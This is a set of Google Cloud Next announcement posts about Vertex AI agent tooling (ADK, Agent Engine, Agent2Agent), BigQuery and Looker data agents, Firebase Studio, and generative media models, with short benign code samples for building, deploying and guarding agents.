Every enterprise will soon rely on multi-agent systems – multiple AI agents working together – even when built on different frameworks or providers. Agents are intelligent systems that can act on your behalf using reasoning, planning, and memory capabilities. Under your supervision, they can think multiple steps ahead and accomplish tasks across various systems.
Multi-agent systems rely on models with enhanced reasoning capabilities, like those available in Gemini 2.5. They also depend on integration with your workflows and connection to your enterprise data. Vertex AI – our comprehensive platform to orchestrate the three pillars of production AI: models, data, and agents – seamlessly brings these elements together. It uniquely combines an open approach with comprehensive platform capabilities to ensure agents perform reliably: a combination that would otherwise require fragmented and fragile solutions.
Today, we’re announcing multiple enhancements to Vertex AI so you can:
Build agents with an open approach and deploy them with enterprise-grade controls
Agent Engine is a fully managed runtime in Vertex AI that helps you deploy your custom agents to production with built-in testing, release, and reliability at a global, secure scale.
Connect agents across your enterprise ecosystem
Agent2Agent protocol gives your agents a common, open language to collaborate – no matter which framework or vendor they are built on. We are driving this open initiative, partnering with 50+ industry leaders (and growing) to advance our shared vision of multi-agent systems.
Equip agents with your data using open standards like Model Context Protocol (MCP) or connect directly with APIs and connectors managed in Google Cloud. You can ground your AI responses in Google Search, your preferred data sources, or with Google Maps data.
Introducing Agent Development Kit and Agent Garden: Building agents with an open approach
Agent Development Kit (ADK) is our new open-source framework that simplifies the process of building agents and sophisticated multi-agent systems while maintaining precise control over agent behavior. With ADK, you can build an AI agent in under 100 lines of intuitive code. Check out the examples here.
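To make that concrete, here is a hedged sketch in the style of the ADK quickstart: a single agent with one Python function exposed as a tool. The agent name, model string, and tool body are illustrative stand-ins rather than canonical sample code.

```python
# Hedged sketch of a minimal ADK agent. Requires: pip install google-adk
from google.adk.agents import Agent

def get_order_status(order_id: str) -> dict:
    """Look up an order's status (placeholder for a real backend call)."""
    return {"order_id": order_id, "status": "shipped"}

root_agent = Agent(
    name="support_agent",
    model="gemini-2.0-flash",        # swap in any model available to you
    instruction="Help customers check order status; be concise and polite.",
    tools=[get_order_status],        # plain Python functions become tools
)
```

From here, the ADK command-line tooling (for example, `adk run` or the `adk web` developer UI) can exercise the agent locally before any deployment.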
ADK is currently available in Python, with more languages coming later in the year. With it, you can:
Shape how your agents think, reason, and collaborate through deterministic guardrails and orchestration controls, giving you precise control over agent behavior and decision-making processes.
Interact with your agents in human-like conversations with ADK’s unique bidirectional audio and video streaming capabilities. With just a few lines of code, you can create natural interactions that change how you work with agents – moving beyond text into rich, interactive dialogue. Check out the demo of an interactive agent built on ADK from the opening keynote at Next 2025 here.
Jumpstart your development with Agent Garden, a collection of ready-to-use samples and tools directly accessible within ADK. Leverage pre-built agent patterns and components to accelerate your development process and learn from working examples.
Choose the model that works best for your needs. ADK works with your model of choice – whether it’s Gemini or any model accessible via Model Garden. Beyond Google’s models, you can choose from 200+ models from providers like Anthropic, Meta, Mistral AI, AI21 Labs, CAMB.AI, Qodo, and more.
Select your deployment target, be it local debugging or any containerized production deployment, such as Cloud Run, Kubernetes, or Vertex AI. ADK also supports Model Context Protocol (MCP), enabling secure connections between your data and agents.
Deploy to production using the direct integration to Vertex AI. This clear, reliable path from development to enterprise-grade deployment removes the typical overhead associated with moving agents to production.
While ADK works with your preferred tools, it’s optimized for Gemini and Vertex AI. For example, AI agents built with ADK using Gemini 2.5 Pro Experimental can break down complex problems through Gemini’s enhanced reasoning capabilities, and work with your preferred systems through its tool use capabilities. You can also deploy this agent to a fully-managed runtime and operate it at enterprise scale, using the native integration to Vertex AI from ADK.
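As a sketch of that develop-to-deploy path, the snippet below wraps an ADK agent for Vertex AI and deploys it to Agent Engine. Exact package paths and arguments may differ by SDK version, and the project, location, and bucket are hypothetical, so treat this as illustrative rather than definitive.

```python
# Hedged sketch of the ADK -> Agent Engine deployment path.
import vertexai
from google.adk.agents import Agent
from vertexai import agent_engines
from vertexai.preview import reasoning_engines

vertexai.init(
    project="my-project",              # hypothetical
    location="us-central1",
    staging_bucket="gs://my-bucket",   # hypothetical
)

root_agent = Agent(
    name="support_agent",
    model="gemini-2.0-flash",
    instruction="Answer order-status questions concisely.",
)

app = reasoning_engines.AdkApp(agent=root_agent)  # wrap the ADK agent

remote_app = agent_engines.create(
    agent_engine=app,
    requirements=["google-cloud-aiplatform[adk,agent_engines]"],
)
print(remote_app.resource_name)  # deployed, managed agent endpoint
```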
ADK framework showing how you can build multi-agent systems
Hear how our customers are already using ADK:
“Using Agent Development Kit, Revionics is building a multi-agent system to help retailers set prices based on their business logic — such as staying competitive while maintaining margins — and accurately forecasting the impact of price changes. ADK streamlines multi-agent transfer and planning, such as knowing when to transfer between specialized agents (data retrieval) and tools (constraint application), thereby combining Revionics’ pricing AI with agentic AI to automate entire pricing workflows. Data is central to Revionics’ process, and the development kit enables agents to efficiently reason over big data through storage artifacts rather than relying solely on the LLM context.” – Aakriti Bhargava, VP of Product Engineering and AI at Revionics.
“We used the ADK to develop an agent that ensures we’re installing EV chargers where drivers need them most. The agent assists our data analysts to leverage geographical, zoning, and traffic data to inform and prioritize critical EV infrastructure investments that maximize driver convenience with less strain on our teams.” – Laurent Giraud, Chief Data (&AI) Officer, Renault Group.
“We’ve implemented the Agent Engine as the backbone of our video analysis AI agent, powered by Gemini. This setup allows us to leverage the Python Vertex AI SDK without worrying about infrastructure, saving us an estimated month of development time. Plus, the Agent Engine’s API seamlessly connects with other Google Cloud products like Workflows, giving us excellent maintainability and room to grow.” – Rina Tsuji, Senior Manager, Corporate Strategy, Nippon Television Holdings, Inc.
Introducing Agent Engine: Deploying AI agents with enterprise-grade controls
Agent Engine is our fully managed runtime that makes it easy to deploy AI agents to production. No more rebuilding your agent system when moving from prototype to production. Agent Engine handles agent context, infrastructure management, scaling complexities, security, evaluation, and monitoring. Agent Engine also integrates with ADK (or your preferred framework) for a frictionless develop-to-deploy experience. Together, you can:
Deploy agents built using any framework – whether you’re using ADK, LangGraph, Crew.ai, or others, and regardless of your chosen model (Gemini, Anthropic’s Claude, Mistral AI, or others). This flexibility is paired with enterprise-grade controls for governance and compliance.
Keep the context in your sessions: Rather than starting from a blank slate each time, the Agent Engine supports short-term memory and long-term memory. This way, you can manage your sessions and your agents can recall your past conversations and preferences.
Measure and improve agent quality with comprehensive evaluation tools from Vertex AI. Improve agent performance by using the Example Store or fine-tune models to refine your agents based on real-world usage.
Drive broader adoption by connecting to Agentspace: You can register your agents hosted on Agent Engine to Google Agentspace. This enterprise platform puts Gemini, Google-quality search, and powerful agents in the hands of employees while maintaining centralized governance and security.
Here’s how it all comes together:
Agent Engine connects across your enterprise for multi-agent systems
In the coming months, we will further expand Agent Engine capabilities with advanced tooling and testing. Your agents will have computer-use capabilities and will be able to execute code. Additionally, a dedicated simulation environment will let you rigorously test agents with diverse user personas and realistic tools to ensure reliability in production.
Introducing Agent2Agent protocol: Connecting agents across your enterprise ecosystem
One of the biggest challenges in enterprise AI adoption is getting agents built on different frameworks and vendors to work together. That’s why we partnered with many industry leaders who share our vision of multi-agent systems to create an open Agent2Agent (A2A) protocol.
Agent2Agent protocol enables agents across different ecosystems to communicate with each other, irrespective of the framework (ADK, LangGraph, Crew.ai, or others) or vendor they are built on. Using A2A, agents can publish their capabilities and negotiate how they will interact with users (via text, forms, or bidirectional audio/video) – all while working securely together.
As of today, 50+ partners such as Box, Deloitte, Elastic, PayPal, Salesforce, ServiceNow, UiPath, UKG, Weights & Biases, and many more are committed to working with us on the protocol. For details on the partners using the protocol, please refer to the blog here.
Defining interoperability together with our partners
Beyond working with other agents, your agents also need access to your enterprise truth – the ecosystem of information you have built across data sources, APIs, and business capabilities. You can equip agents with your existing enterprise truth data without building from scratch, using any approach you prefer:
ADK supports Model Context Protocol (MCP), so your agents connect to the vast and diverse data sources or capabilities you already rely on by leveraging the growing ecosystem of MCP-compatible tools.
From ADK, you can also connect your agents directly to your enterprise systems and capabilities. This includes 100+ pre-built connectors, workflows built with Application Integration, or data stored within your systems like AlloyDB, BigQuery, NetApp and much more. For example, you can build AI agents directly on your existing NetApp data, no data duplication required.
Using ADK, you can also seamlessly connect to your existing agents built in other frameworks like LangGraph or call tools from diverse sources including MCP, LangChain, CrewAI, Application Integration, and any OpenAPI endpoints.
In Apigee API management, we manage over 800K APIs that power your business, within and beyond Google Cloud. Using ADK, your agents can also tap into these existing API investments – no matter where they reside – with proper permissions.
Once connected, you can ground your AI responses with information like Google Search or specialized data from providers like Cotality, Dun & Bradstreet, HGInsights, S&P Global, and Zoominfo. For agents that rely on geospatial context, today we’re making it possible to ground your agents with Google Maps1. We make 100 million updates to Maps data every day, ensuring it is fresh and factual. And now, using Grounding with Google Maps, your agents can provide responses with geospatial information tied to millions of places in the U.S.
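As one concrete, widely available example of grounding, the Vertex AI SDK can attach Google Search as a grounding tool to a Gemini model. (Grounding with Google Maps is experimental and has its own setup, so it is not shown here.) The project and location values are placeholders.

```python
# Grounding a Gemini response in Google Search with the Vertex AI SDK.
# Requires: pip install google-cloud-aiplatform
import vertexai
from vertexai.generative_models import GenerativeModel, Tool, grounding

vertexai.init(project="my-project", location="us-central1")  # placeholders

model = GenerativeModel("gemini-1.5-flash-002")
search_tool = Tool.from_google_search_retrieval(grounding.GoogleSearchRetrieval())

response = model.generate_content(
    "What connectivity options does Cloud WAN offer?",
    tools=[search_tool],  # responses are grounded in cited web sources
)
print(response.text)
```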
Enterprise grade security for your AI agents: Building agents your enterprise can trust
Beyond functionality, enterprise AI agents operating in production face security concerns like prompt injection attacks, unauthorized data access, and generating inappropriate content. Building with Gemini and Vertex AI in Google Cloud addresses these challenges in multiple layers. You can:
Control agent output using Gemini’s built-in safety features including configurable content filters and system instructions that define boundaries around prohibited topics and align with your brand voice.
Manage agent permissions through identity controls that let you determine whether agents operate with dedicated service accounts or on behalf of individual users, preventing privilege escalation and unauthorized access.
Protect sensitive data by confining agent activity within secure perimeters using Google Cloud’s VPC service controls, preventing data exfiltration and limiting potential impact radius.
Establish guardrails around your agents to control interactions at every step – from screening inputs before they reach models to validating parameters before tool execution. You can configure defensive boundaries that enforce policies like restricting database queries to specific tables or adding safety validators using lightweight models (see the sketch after this list).
Auto-monitor agent behavior using comprehensive tracing capabilities that give you visibility into every action an agent takes, including its reasoning process, tool selection, and execution paths.
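To illustrate the guardrails item above, the pattern itself is framework-agnostic: validate tool arguments against policy before the tool executes. The table allowlist, tool name, and function below are hypothetical; frameworks such as ADK expose hooks (for example, a before-tool callback) where a function like this can veto a call.

```python
# Framework-agnostic guardrail sketch: screen tool calls against a policy
# before they execute. Table names and the policy itself are hypothetical.
ALLOWED_TABLES = {"orders", "shipments"}

def guard_tool_call(tool_name: str, args: dict):
    """Return None to allow the call, or an error payload to block it."""
    if tool_name == "run_sql":
        table = args.get("table", "")
        if table not in ALLOWED_TABLES:
            return {"error": f"access to table '{table}' is not permitted"}
    return None  # allow

# Example: a blocked call
print(guard_tool_call("run_sql", {"table": "employees"}))
# -> {'error': "access to table 'employees' is not permitted"}
```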
Get started building multi-agent systems
The real value of Vertex AI isn’t just the individual capabilities outlined above, but in how they work together as an integrated whole. What previously required piecing together fragmented solutions from multiple vendors now flows seamlessly through a single platform. This unified approach eliminates painful tradeoffs between models, integration with enterprise apps and data, or production readiness. The result isn’t just faster development – it’s more reliable agents ready for enterprise workflows. To get started today:
1. Grounding with Google Maps is currently available as an experimental release in the United States, providing access to only places data in the United States.
Today’s fast-paced environment demands more than just data access; it requires a real-time data activation flywheel. A new reality is emerging where AI, infused directly into the data landscape, works hand-in-hand with intelligent agents. These agents act as catalysts, unlocking insights for everyone, and enabling the autonomous, real-time action that’s critical for success. Google’s Data & AI Cloud is built to power this flywheel, bringing AI to data for continuous, real-time data activation — a focus that’s attracting 5x more organizations to BigQuery than the two leading cloud companies that exclusively offer data warehouse and data science platforms.
Radisson Hotel Group boosted campaign productivity by 50% and revenue by over 20% using Gemini model fine-tuning with BigQuery.
Gordon Food Service used BigQuery to unify 170+ data sources, creating a scalable modern data architecture and an AI-ready foundation. This improved real-time response to critical business needs and enabled comprehensive analytics, driving a significant increase in customer adoption of its ordering applications and providing timely insights to employees, all while reducing costs and gaining market share.
J.B. Hunt is transforming logistics for shippers and carriers by consolidating fragmented systems, including Databricks, onto a unified BigQuery platform.
General Mills saves over $100 million using BigQuery and Vertex AI by giving employees secure access to LLMs to answer questions based on structured and unstructured data.
“We didn’t just need a place to store or consume data, we wanted a collaborator that could help us scale the most advanced data management in the industry.” – Jaime Montemayor, Chief Digital & Technology Officer, General Mills
Today, we’re announcing several new innovations with our autonomous data to AI platform powered by BigQuery, alongside our unified, trusted, and conversational BI platform with Looker:
Specialized agents for every user: New assistive and agentic experiences, grounded in your trusted data and available in BigQuery and Looker, are set to simplify and accelerate the work of data engineers, data scientists, analysts and business users.
Accelerating data science and advanced analytics: We are enhancing data science workflows in BigQuery with new AI-assisted notebooks and unlocking new insights with our BigQuery AI Query Engine, alongside seamless integration with real-time and open-source technologies.
Autonomous data foundation: New autonomous capabilities in BigQuery capture, manage, and orchestrate all data types, including native support for unstructured data handling and open data formats like Iceberg.
Let’s take a deeper look at each of these developments.
1. Specialized agents for every user
We believe AI should be accessible to everyone. We have made AI-driven assistive experiences broadly available in BigQuery and Looker, and now we are expanding to specialized agents that meet the needs of every data role, including:
Data engineering agent capabilities, embedded in BigQuery pipelines (GA), deliver support to build data pipelines, perform data preparation (GA) such as transformation and enrichment of data, maintain data quality with anomaly detection (preview), and automate metadata generation. Data engineers traditionally spend countless hours cleaning, transforming, and validating data — these agents take over tedious, time-consuming tasks and help ensure trusted data, boosting the productivity of your data teams.
Data science agent (GA), embedded within Google’s Colab notebook, supports every stage of model development. It automates feature engineering, provides intelligent model selection, and enables scalable training and faster iteration. This agent allows data science teams to focus on building advanced data science workflows instead of wrestling with data and infrastructure.
Looker conversational analytics (preview) empowers every user to interact with data using natural language. Expanded capabilities, developed in partnership with DeepMind, not only conduct advanced analysis but also explain their reasoning transparently, empowering all users to understand the agent’s behavior and seamlessly resolve ambiguities. In addition, Looker’s semantic layer improves accuracy by as much as two-thirds: as users reference business terms like ‘revenue’ or ‘segments,’ the agent knows exactly what they mean and can calculate metrics in real time, delivering accurate, relevant, and trusted results. We are also launching a conversational analytics API (preview) for developers to build and embed conversational analytics into applications and workflows.
Interact using natural language with Looker Conversational Analytics Agent
To power intelligence across assistive and agentic experiences in the BigQuery autonomous data to AI platform, we are also launching BigQuery knowledge engine (preview). It leverages the power of Gemini to analyze schema relationships, table descriptions, and query histories to generate metadata on the fly, model data relationships, and recommend business glossary terms. This knowledge engine is the foundation of AI-powered experiences, including AI-powered data insights and semantic search (GA) across BigQuery, grounding AI and agents in business context.
Today, all of our Gemini-powered assistive and agentic experiences in BigQuery and Looker are available to all customers within the existing tiers of our pricing models — no add-ons required.
2. Accelerating data science and advanced analytics
Our BigQuery autonomous data to AI platform is fundamentally changing how data scientists and analysts work, enabling new AI-driven data science experiences and new engines that process complex data and support advanced analyses in real time.
First, we’re supercharging the BigQuery notebook experience with AI. We are introducing intelligent SQL cells that understand your data’s context, provide smart suggestions as you write code, and enable you to join data sources directly within your notebook. We are also adding native exploratory analysis and visualization capabilities, making it easy to explore data, along with features for easier collaboration with colleagues. Data scientists can also schedule analyses to run and refresh insights periodically. And, to share insights more broadly across the organization, we are introducing the ability to build interactive data apps – dynamic, user-friendly interfaces powered by your notebook.
AI Powered Data Science Experience
Building on this enhanced notebook environment, we are also announcing BigQuery AI query engine to support advanced, AI-driven analytics. This engine enables data scientists to move beyond simply retrieving structured data to seamlessly processing both structured and unstructured data together with added real-world context. The BigQuery AI query engine co-processes traditional SQL alongside Gemini to inject runtime access to real-world knowledge, linguistic understanding, and reasoning abilities. A data scientist can now ask questions like: “Which products in our inventory are primarily manufactured in countries with emerging economies?” The foundation model inherently knows which countries are considered emerging economies. Analysts can ask: “Which products are included in these social media images?” and our new engine processes the unstructured images and matches them to your product catalog. This engine supports a broad range of use cases, including building richer features for models, performing nuanced segmentation, and uncovering insights previously out of reach.
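As a rough sketch of that pattern, the snippet below issues one of these questions through the standard google-cloud-bigquery client. The AI.GENERATE_BOOL call and the table name are placeholders for illustration; consult the BigQuery documentation for the function names and syntax that actually ship with the AI query engine.

```python
# Sketch only: the AI function and table below are illustrative placeholders.
from google.cloud import bigquery

client = bigquery.Client()

sql = """
SELECT product_name, country_of_origin
FROM `my_project.inventory.products`
WHERE AI.GENERATE_BOOL(
  ('Is this country generally considered an emerging economy?', country_of_origin)
)
"""

# Run the query and print matching rows.
for row in client.query(sql).result():
    print(row.product_name, row.country_of_origin)
```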
Furthermore, we empower users with the best of the open-source ecosystem, enhanced for the cloud. Google Cloud for Apache Kafka (GA) facilitates real-time data pipelines for event sourcing, model scoring, messaging, and real-time analytics, and we now support serverless execution of Apache Spark workloads within BigQuery (preview). Customer use of our serverless Spark capability has nearly doubled in the past year, and we have enhanced this engine to provide 2.7x faster processing than the prior year.
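For readers new to the pattern, here is a minimal PySpark sketch of the kind of workload this enables, written against the open-source spark-bigquery connector; the project and table names are placeholders, and in the serverless offering the Spark runtime is provisioned for you.

```python
# Placeholder project/table names; the serverless runtime supplies the Spark session.
from pyspark.sql import SparkSession
from pyspark.sql import functions as F

spark = SparkSession.builder.appName("bq-serverless-spark-sketch").getOrCreate()

# Read a BigQuery table through the spark-bigquery connector.
orders = (
    spark.read.format("bigquery")
    .option("table", "my_project.sales.orders")
    .load()
)

# Apply business logic that is awkward in pure SQL, then aggregate.
daily_revenue = (
    orders.filter(F.col("status") == "COMPLETE")
    .groupBy("order_date")
    .agg(F.sum("amount").alias("revenue"))
)

# Write the result back to BigQuery.
(
    daily_revenue.write.format("bigquery")
    .option("table", "my_project.sales.daily_revenue")
    .option("writeMethod", "direct")
    .mode("overwrite")
    .save()
)
```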
BigQuery allows data scientists to leverage the tools they need on Google’s serverless and scalable architecture, whether it’s SQL, Spark, or the semantic power of foundation models, enabling faster innovation without traditional infrastructure challenges.
“We see SQL and Spark as two complementary ways of accessing and transforming data. Spark is especially useful to us in use cases that require complex business logic, which although niche, are extremely business-critical. Having a unified platform for SQL, Spark and AI, with the development experience in notebooks, will considerably simplify these critical use cases.” – Andrés Sopeña Pérez, Head of Data and AI, Trivago
3. An autonomous data foundation across the entire data lifecycle
Underpinning our specialized agents and advanced analytics engines is an autonomous data foundation designed for the complexity of modern data. We are fundamentally changing the landscape by making unstructured data a first-class citizen within BigQuery. This is achieved with new capabilities in the platform including autonomous and invisible governance, orchestration for diverse data workloads, and a commitment to flexibility via open formats, ensuring your data is always ready for any data science or AI challenge. And we do all of this while minimizing operational overhead and delivering optimal price performance.
The biggest untapped opportunity for many organizations lies in the potential of their unstructured data. While structured data has pathways to analysis, unique insights embedded in images, audio, video, and text are often hard to extract and underutilized, and typically reside in siloed systems. BigQuery directly tackles this challenge by making unstructured data a first-class citizen with multimodal tables (preview), allowing you to bring rich, complex data types alongside structured data for unified storage and querying. To effectively manage this comprehensive data estate, our enhanced BigQuery governance (preview) provides a single, unified view for data stewards and professionals to handle discovery, classification, curation, quality, usage, and sharing, including automated cataloging (GA) and metadata generation (experimental). Moreover, to ensure timely insights from all your data streams, BigQuery continuous queries (GA) enable instant analysis and action on streaming data using SQL, regardless of its original format.
Our advanced support for multimodal data, both structured and unstructured, is driving adoption – customer use of Google’s AI models in BigQuery for multimodal analysis has grown by 16x year over year. Our integrated approach to data and AI is also cost-effective: together, BigQuery and Vertex AI are between 8x and 16x more cost-efficient than other independent data warehouse and AI platforms.
Our commitment to an open ecosystem remains paramount. BigQuery tables for Apache Iceberg (preview) deliver the flexibility of an open data lakehouse alongside the performance and integrated tooling of BigQuery, allowing you to connect your Iceberg data to SQL, Spark, AI, and third-party engines in an open and interoperable manner. This offering provides adaptive and autonomous table management, high-performance streaming, AI-generated insights, near-infinite serverless scale, and advanced governance. Through integration with Cloud Storage, our managed service provides centralized, fine-grained access control management and fail-safe capabilities.
Finally, the autonomous data to AI platform is self-optimizing. It scales resources, manages workloads, and helps ensure their cost-effectiveness with advanced workload management capabilities (GA). Furthermore, we’ve simplified purchasing with the new BigQuery spend commit (GA), unifying spend across our BigQuery platform, providing flexibility to move spend across data processing engines, streaming, governance, and more.
Get started on your data and AI journey by taking advantage of our BigQuery data migration offer. We can’t wait to learn about the ways you are innovating using data.
Millions of developers use Firebase to engage their users, powering over 70 billion instances of apps every day, everywhere — from mobile devices and web browsers, to embedded platforms and agentic experiences. But full-stack development is evolving quickly, and the rise of generative AI has transformed not only how apps are built, but also what types of apps are possible. This drives greater complexity, and puts developers under immense pressure to keep up with many new technologies that they need to manually stitch together. Meanwhile, businesses of all sizes are seeking ways to make AI app development cycles more efficient, deliver quality software, and get to market faster.
Today at Google Cloud Next, we’re introducing a suite of new capabilities that transforms Firebase into an end-to-end platform to accelerate the complete application lifecycle. The new Firebase Studio, available to everyone in preview, is a cloud-based, agentic development environment powered by Gemini that includes everything developers need to create and publish production-quality AI apps quickly, all in one place. Several more updates across the Firebase platform are helping developers unleash their modern, data-driven apps on Google Cloud. These announcements will empower developers to forge new paths for building AI applications across multiple platforms.
Meet Firebase Studio
Over the past year, we launched many new services, including Gemini in Firebase, Genkit, and Project IDX (a fork of Code OSS), to make building AI apps faster and easier. We’re taking a significant step forward with the launch of Firebase Studio, which fuses all of these capabilities together with Firebase services and the creative power of Gemini into a new, natively agentic experience.
Firebase Studio helps you build full-stack AI apps
For new apps, choose from over 60 pre-built templates or get started with the App Prototyping agent. It assists you with designing your app — such as the UI, API schema, and AI flows — all using natural language, images, drawing tools, and screenshots. Keep prompting to iterate on your prototype, and when ready, deploy it directly to Firebase App Hosting. Share a URL to a fully functional version of your prototype to get feedback or run experiments. Monitor usage and behavior at a glance, or jump into the Firebase Console for more detailed monitoring. At any time, you can open your app inside a Firebase Studio coding workspace with a single click and no additional setup. There, you can refine the architecture and expand features to prepare for production deployment.
Coding workspaces also enable you to:
Simplify coding workflows: Write code and test features, all with assistance from Gemini in Firebase at every step of the way. Complete a variety of tasks like debugging, testing, refactoring, explaining, and documenting code with ease.
Enhance existing apps: Import existing codebases from your local machine or git-based repositories, including GitHub, GitLab, and Bitbucket. Create custom templates for your preferred tech stacks to share across your team.
Create full-stack experiences: Customize and evolve all aspects of your apps, from AI model inference, agents, and retrieval augmented generation (RAG), to the user experience, business logic, database, and more. Easily expose and integrate tools such as APIs and microservices to your AI apps.
Work with familiar tools: Bring along your specific configurations, such as system tools, extensions, and environment variables to tailor your workspaces. Access thousands of extensions from the Open VSX Registry.
Deploy flexibly: Set up your app to run on the cloud with built-in integrations to Firebase backend services and Google Cloud Run. You can also deploy on your own custom infrastructure.
Firebase Studio is currently available with three workspaces at no cost during preview. Members of the Google Developer Program get up to 30 workspaces. Check out Firebase Studio today.
Engage AI agents throughout your entire workflow
We’re also providing early access to Gemini Code Assist agents from within Firebase Studio. For example, you might invoke the Migration agent in Firebase Studio to help you migrate your code between versions of Java; the AI Testing agent to run adversarial tests against AI models to uncover and fix potentially harmful outputs; and the Code Documentation agent to chat with a wiki-style knowledge base about your code to ease the onboarding of new team members.
Firebase App Distribution is a unified mobile app testing service for running manual and automated tests. The new App Testing agent in Firebase App Distribution can simulate real-world user interactions with your app. For example, you can write a test that sets a goal to “Find a trip to Greece.” The App Testing agent will use Gemini to formulate a plan to achieve that goal and run it on virtual or physical devices, navigating your UI and producing detailed pass/fail results with intuitive rationales and visuals of the paths that the agent chose. The App Testing agent is available now in preview, and you can try it out on your Android app today, with more platforms coming this year.
The new App Testing agent in Firebase App Distribution
Create new AI app experiences
A lack of best practices and standards creates challenges when integrating cutting-edge AI features into your applications. That’s why we’re continuing to invest in robust frameworks, SDKs, and tooling to help streamline the development process, freeing you to focus on crafting truly engaging and innovative user interactions.
Expanded language support for Genkit: Genkit helps reduce the complexity of building, testing, and monitoring your apps’ AI features. Develop powerful agentic experiences with support for structured output, tool calling, human-in-the-loop interactions, retrieval augmented generation (RAG), Model Context Protocol (MCP), and multi-model orchestration. Today, we’re making it easier to do that in your preferred language by introducing early support for Python and expanded support for Go. Access Gemini models, Imagen 3, and additional models such as Llama and Mistral through Vertex Model Garden, plus self-hosted models with Ollama, and a growing ecosystem of third-party models using community plugins.
Try this template in Firebase Studio to build with Genkit.
Genkit helps you build AI-powered features
New models through Vertex AI in Firebase: Vertex AI in Firebase lets developers integrate generative AI into their applications through a streamlined, secure SDK. It’s used by thousands of apps today, such as Meal Planner, a meal planning and shopping list management app; Life, an AI-powered diary assistant; HiiKER, an offline hiking maps provider; and Waveful, a social media app for creators. In March, we added support for Imagen 3 models (Imagen 3 and Imagen 3 Fast), in addition to the Gemini family of models, which lets you add image generation directly to your Android, iOS, Flutter, and Web applications. Today, we are adding support for the Gemini 2.0 Multimodal Live API, enabling more conversational interactions in apps, like allowing customers to ask audio questions and get responses.
The Gemini 2.0 Multimodal Live API used via Vertex AI in Firebase
Accelerate modern, data-driven apps
We’re also providing you with greater control of your app architecture and deployment processes with Firebase Data Connect and Firebase App Hosting, now generally available.
Build sophisticated apps with Firebase Data Connect: Firebase Data Connect offers the robust reliability of Google Cloud SQL for PostgreSQL with instant GraphQL APIs and type-safe SDKs. Build a wide range of experiences, like social media apps with complex user relationships, e-commerce platforms with large product catalogs, or personalized recommendations with built-in vector search.
Data Connect now helps you to:
Easily generate schemas and queries: Use Gemini in Firebase to automatically generate your Data Connect schemas, queries, mutations, and client SDKs, significantly speeding up backend development.
Leverage expanded query capabilities: Data Connect now offers native aggregation support for deeper data insights, atomic data modifications, and transactions with server value expressions, helping to ensure data integrity across complex operations.
Build with web frameworks: Enjoy tight integration and streamlined data handling with generated type-safe hooks and components for web frameworks, enabling rapid development of dynamic, data-driven applications.
Firebase Data Connect in Firebase Studio
Deploy with Firebase App Hosting: Firebase App Hosting is an opinionated, git-centric hosting solution for modern, full-stack web apps. App Hosting accelerates time-to-market by managing your app’s entire stack, from the build, to the CDN, to server-side rendering. You push to GitHub, and App Hosting figures out the rest. App Hosting is built on enterprise-grade Google Cloud services: Cloud Build, Cloud Run, Cloud CDN, and more.
With this release of App Hosting, you can:
Easily test and troubleshoot builds: App Hosting now has a local emulator and improved error messages to help you get ahead of and troubleshoot build failures.
Recover from production incidents in seconds: Use App Hosting’s new monitoring dashboard to understand your app’s performance and health, and instantly roll back to a previous version if you spot a regression.
Connect to a Virtual Private Cloud (VPC): Give your app access to backend services in your Google Cloud project that are not accessible on a public IP address (e.g., caching content with Cloud Memorystore, or accessing data from non-Firebase databases).
New monitoring dashboard in Firebase App Hosting
Get ready to reimagine not just how you build your apps, but also what kinds of apps you can build! Learn more about these products and more on the Firebase blog. We can’t wait to see what you create with the Firebase platform.
Today, we’re continuing to invest in generative media by adding Lyria, Google’s text-to-music model, to Vertex AI in preview with allowlist. With the addition of music, Vertex AI is now the only platform with generative media models across all modalities – video, image, speech, and music. This means you can build a complete, production-ready asset starting from a text prompt, to an image, to a complete video asset with music and speech.
In addition to Lyria, we’re launching new features and updates to improve our other generative media models:
New editing and camera control features for Veo 2, our advanced video generation model, are available in preview with allowlist to help our customers refine and repurpose video content with precision. This gives you creative control over your video, helping your teams iterate faster, produce higher-quality content, and reduce post-production time and costs.
Chirp 3, our groundbreaking audio generation and understanding model, now includes Instant Custom Voice, a new way to create custom voices with just 10 seconds of audio input. You can also weave AI-powered narration into your existing recordings, and add a speech transcription capability that can distinguish between speakers. Both features are available through a preview with allowlist.
Imagen 3, our highest quality text-to-image model, now has improved image generation and inpainting capabilities for reconstructing missing or damaged portions of an image. Our latest update significantly elevates the quality of object removal, delivering a more natural and seamless editing experience.
In alignment with our AI Principles, the development and deployment of Lyria, Veo 2, Chirp 3, and Imagen 3 on Vertex AI prioritizes safety and responsibility with built-in precautions like digital watermarking via SynthID, safety filters, and data governance. And, with our industry-first approach to indemnification, you can use content generated with a range of our products knowing Google will indemnify you for third-party IP claims, including copyright.
Lyria: Text-to-music model now available on Vertex AI
Lyria produces high-fidelity audio, meticulously capturing subtle nuances and delivering rich, detailed compositions across a range of musical genres. Lyria on Vertex AI can help enterprises:
Elevate brand experiences: Quickly create soundtracks for marketing campaigns, product launches, or immersive in-store experiences, all tailored to your brand’s unique identity. Lyria enables you to create sonic branding that resonates deeply with your target audience, fostering emotional connections and enhancing brand recall.
Streamline content creation: For video production, podcasting, and digital content creation, finding the perfect royalty-free music can be a time-consuming and costly process. Lyria eliminates these hurdles, allowing you to generate custom music tracks in minutes, directly aligning with your content’s mood, pacing, and narrative. This can help accelerate production workflows and reduce licensing costs.
For example:
Craft a high-octane bebop tune. Prioritize dizzying saxophone and trumpet solos, trading complex phrases at lightning speed. The piano should provide percussive, chordal accompaniment, with walking bass and rapid-fire drums driving the frenetic energy. The tone should be exhilarating, and intense. Capture the feeling of a late-night, smoky jazz club, showcasing virtuosity and improvisation. The listener should not be able to sit still.
Expanding Veo 2 with a new robust set of editing features
Today, we’re announcing the preview of a robust feature set that helps you create videos, edit them, and add visual effects with Veo 2. These features help teams edit and repurpose video content to meet your evolving needs, transforming Veo on Vertex AI from a generation tool to a comprehensive video creation and editing platform. Now you can:
Refine and enhance existing footage with:
Inpainting: Get clean, professional edits without manual retouching. You can remove unwanted background images, logos, or distractions from your videos, making them disappear smoothly and perfectly in every single frame, so it looks like they were never there.
Clean, professional edits without manual retouching
Outpainting: Extend the frame of existing video footage, transforming traditional video into optimized formats for web and mobile platforms. This helps make it easy to adapt your content for various screen sizes and aspect ratios – for example, converting landscape video to portrait for social media shorts.
Outpainted video with an extended frame
Implement sophisticated cinematic techniques: New features include directing shot composition, camera angles, and pacing that help teams use sophisticated cinematic techniques with ease, without requiring complex prompting or specialized expertise. For example, you can use camera pre-sets to move the camera in different directions, create a timelapse effect, or generate a drone style shot.
New Veo 2 editing features for directing shot composition
